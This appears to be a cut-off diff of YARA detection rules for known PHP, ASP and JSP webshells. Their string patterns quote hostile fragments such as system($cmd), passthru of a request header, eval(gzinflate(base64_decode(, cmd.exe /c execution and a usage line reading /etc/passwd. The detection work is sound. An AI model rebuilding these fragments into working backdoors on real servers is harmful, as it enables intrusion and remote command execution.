+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6139-L6155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b815611cc39f17f05a73444d699341d4"
-		logic_hash = "8b0e425c7d71ea2c536192ff186665e7f0fbdbc0e0d195d7107ac57cf9bd1773"
+		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
+		logic_hash = "e58dbd6b9c65a139828890a3fadfad9031580fe189066489d266d37d7078ad98"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
-		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
-		$s2 = "cmdjsp.jsp"
-		$s3 = "michaeldaw.org" fullword
+		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
+		$s8 = "$curcmd = $_POST['king'];" fullword
+		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
+		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
+		$s19 = "_|_  O    _    O  _|_"
+		$s20 = "$curcmd = \"ls -lah\";" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_H4Ntu_Shell__Powered_By_Tsoi_
+rule SIGNATURE_BASE_Webshell_Simple_PHP_Backdoor_By_DK
 {
 	meta:
-		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "186358e6-88a3-5fad-b1ba-a49b2a5dea1c"
+		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2c424714-1d2c-5b89-b1bc-a201e37a0a5d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4905-L4916"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6156-L6171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-		logic_hash = "32c620a4ed3f7a8640928e2211516978c12cfbdedb7d96e923303740407b5a1c"
+		hash = "03f6215548ed370bec0332199be7c4f68105274e"
+		logic_hash = "1f65f759ec4045c521085aad84d0aea4dcfcf26eac4357751cf1dde6886d1718"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "h4ntu shell"
-		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s8 = "system($cmd);" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Ajan_Asp
+rule SIGNATURE_BASE_Webshell_Moroccan_Spamers_Ma_Edition_By_Ghost
 {
 	meta:
-		description = "Semi-Auto-generated  - file Ajan.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6040fd88-b992-5110-8b37-7711ace30b1a"
+		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4fa9ce70-d300-55fe-bf98-636f026317ec"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4917-L4929"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6172-L6185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b6f468252407efc2318639da22b08af0"
-		logic_hash = "13988af864a62ca04501288d4f2d830815ab453b14cef6795fe993db1dd1a9ef"
+		hash = "31e5473920a2cc445d246bc5820037d8fe383201"
+		logic_hash = "0e3d2d97665b8849d121d63a22baf7393047a814dde3753e395418c1868b59be"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "c:\\downloaded.zip"
-		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
-		$s3 = "http://www35.websamba.com/cybervurgun/"
+		$s4 = "$content = chunk_split(base64_encode($content)); " fullword
+		$s12 = "print \"Sending mail to $to....... \"; " fullword
+		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_PHANTASMA_Php
+rule SIGNATURE_BASE_Webshell_C99Madshell_V__2_0_Madnet_Edition
 {
 	meta:
-		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "21ff4cee-9cdc-57d1-9c43-e033fdb47de0"
+		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "51db0495-14f3-527e-865b-1405db57ff27"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4930-L4943"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6186-L6201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "52779a27fa377ae404761a7ce76a5da7"
-		logic_hash = "d4a2a1bcc1ff3264b35f2b05d7de664b56807977f2a793fd87206f046a185d3b"
+		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
+		logic_hash = "7cf825a604783ebc74b1dca53aaff5c886957c562e11276f2acce5ff1f6ab991"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = ">[*] Safemode Mode Run</DIV>"
-		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
-		$s2 = "[*] Spawning Shell"
-		$s3 = "Cha0s"
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"\";  //Pass" fullword
+		$s3 = "$login = \"\"; //Login" fullword
+		$s4 = "//Authentication" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Mysql_Web_Interface_Version_0_8_Php
+rule SIGNATURE_BASE_Webshell_Cmdasp_Asp_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "90616d2d-082b-5983-a859-62d1c5b8066e"
+		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "184b1731-31a9-5040-aa25-d145e8064758"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4944-L4957"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6202-L6221"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "36d4f34d0a22080f47bb1cb94107c60f"
-		logic_hash = "f0a20870a3240948e3ef1ad61685b00c5fc90d6098b87af9ac43ab44ccd13c9e"
+		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"
+		logic_hash = "0fd9c7e83ad9ddf5cf88f1d1573324d9f24ae03a1951446fe11c116fd0cf4932"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SooMin Kim"
-		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
-		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
-		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword
+		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword
+		$s6 = "' --------------------o0o--------------------" fullword
+		$s8 = "' File: CmdAsp.asp" fullword
+		$s11 = "<-- CmdAsp.asp -->" fullword
+		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
+		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
 
 	condition:
-		2 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Simple_Cmd_Html
+rule SIGNATURE_BASE_Webshell_NCC_Shell
 {
 	meta:
-		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "30990574-02a0-5eed-8317-847b6be13300"
+		description = "PHP Webshells Github Archive - file NCC-Shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3a2dab3d-faf0-52a5-b114-db402885c618"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4958-L4971"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6222-L6238"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c6381412df74dbf3bcd5a2b31522b544"
-		logic_hash = "56b5b9e5518fa8a4be8c48735e997a538b0e534ad8fd72c1419dc0e8353bbc00"
+		hash = "64d4495875a809b2730bd93bec2e33902ea80a53"
+		logic_hash = "c58edc548b7804be25f6956e9407cc9f8c74dfd8651f601a87ba639284e612d9"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<title>G-Security Webshell</title>" fullword
-		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
-		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
-		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+		$s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword
+		$s1 = "<b>--Coded by Silver" fullword
+		$s2 = "<title>Upload - Shell/Datei</title>" fullword
+		$s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><"
+		$s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword
+		$s18 = "printf(\"Sie ist %u Bytes gro" fullword
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE__1_C2007_Php_Php_C100_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_README
 {
 	meta:
-		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "00ada6a4-a32a-5184-867d-e10a8c95c41c"
+		description = "PHP Webshells Github Archive - file README.md"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4972-L4986"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6239-L6251"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f6cb7c210bcd0f84c2ccff52850b1d673622ae49b83d614d63b5bbba7392327"
+		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
+		logic_hash = "aa8a9be74bbac08518d5ba442aa6fa37d3f1b255df48b49ccb9842f5728a49d5"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash1 = "d089e7168373a0634e1ac18c0ee00085"
-		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
-		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
+		$s1 = "php-webshells" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE__Nst_Php_Php_Img_Php_Php_Nstview_Php_Php
+rule SIGNATURE_BASE_Webshell_Backupsql
 {
 	meta:
-		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "238242f5-4e57-5edb-8806-ea5e06f1f637"
+		description = "PHP Webshells Github Archive - file backupsql.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "15d6e967-1e53-53b4-a2cf-7786452495d4"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4987-L5002"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6252-L6267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b1e13f75edbbc8f9263e0e516a54330ce57190ba0b45813dad4bafeaeefa389b"
+		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
+		logic_hash = "0126bfad6eb3861e8322ac3e11b4fd95bc8b88597d916e66c6646d7d5529c1d5"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
-		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
-		hash2 = "4745d510fed4378e4b1730f56f25e569"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
-		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
-		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
+		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
+		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
+		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
+		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE__Network_Php_Php_Xinfo_Php_Php_Nfm_Php_Php
+rule SIGNATURE_BASE_Webshell_AK_74_Security_Team_Web_Shell_Beta_Version
 {
 	meta:
-		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4fd11db6-902d-5f1a-96c5-9dfcccce7488"
+		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e93a6ac3-080f-53d3-8368-b9feb509a2ea"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5003-L5017"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6268-L6281"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "913ff19b6448d3b074440c2a5f85d85813fdf010d33dc57c89ba1e5db6455e11"
+		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"
+		logic_hash = "4fbf8f5cab8593fd88e5a430b849e61d7d663c13700f459aa516c5b337d5438b"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
-		hash1 = "2601b6fc1579f263d2f3960ce775df70"
-		hash2 = "401fbae5f10283051c39e640b77e4c26"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
-		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
+		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword
+		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."
+		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Cpanel
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
+		description = "PHP Webshells Github Archive - file cpanel.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5018-L5033"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6282-L6298"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a4bae5456baf0d8d894165c84d66118f2b16cfc040e299c2032eccb6a9eb4822"
+		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
+		logic_hash = "e4dc90c52648f1e5b7dc2d77dcb94feb774ec9e3c156c923c54a9e8f537bbf07"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
-		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
+		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
+		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
+		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
+		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
+		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
+		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Webshell_Accept_Language
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
+		description = "PHP Webshells Github Archive - file accept_language.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "343ed2a4-4bed-5e73-8d05-f9573b0147af"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5034-L5051"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6299-L6310"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0df3e00f752f85aa1f150c01e3ef41b9a5cd3d3ce2060965992320cb3c4d87ae"
+		hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
+		logic_hash = "6d45071722268f5b39b1486a7dce883ecefb2b3c9993357b7b58bd603ff1c40d"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash3 = "8023394542cddf8aee5dec6072ed02b5"
-		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash5 = "817671e1bdc85e04cc3440bbd9288800"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
-		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
+		$s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php_Ctt_Sh_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_529
 {
 	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file 529.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5052-L5068"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6311-L6328"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "137f98b636ec012d7d5e687f7d24ae88e8d3261360e60a4bbc03da248cce381e"
+		hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3"
+		logic_hash = "f46b84d51077f157c83cd01534dfe7f9cd0d9ef04ad9935ced22d2abc873c171"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash3 = "671cad517edd254352fe7e0c7c981c39"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
-		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
-		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
+		$s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword
+		$s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin"
+		$s9 = "echo '<PRE><P>This is exploit from <a " fullword
+		$s10 = "This Exploit Was Edited By KingDefacer" fullword
+		$s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword
+		$s14 = "$hardstyle = explode(\"/\", $file); " fullword
+		$s20 = "while($level--) chdir(\"..\"); " fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Webshell_STNC_Webshell_V0_8
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d287136c-534b-51a4-88fc-40ef9f22d910"
+		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5dc300a2-9965-52e3-a382-b8d327eb7029"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5069-L5083"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6329-L6342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "09892789e8dad16f9fc7c4e22525e5d0af3af401a4b2655b70f7a6856888875c"
+		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
+		logic_hash = "c2067a1b78c441aa05366b612090e0df895c621843038cc9e65beb6719c0cb9a"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash2 = "817671e1bdc85e04cc3440bbd9288800"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
-		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
+		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
+		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
+		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Generic
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Tryag
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		description = "PHP Webshells Github Archive - file tryag.php"
+		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5084-L5104"
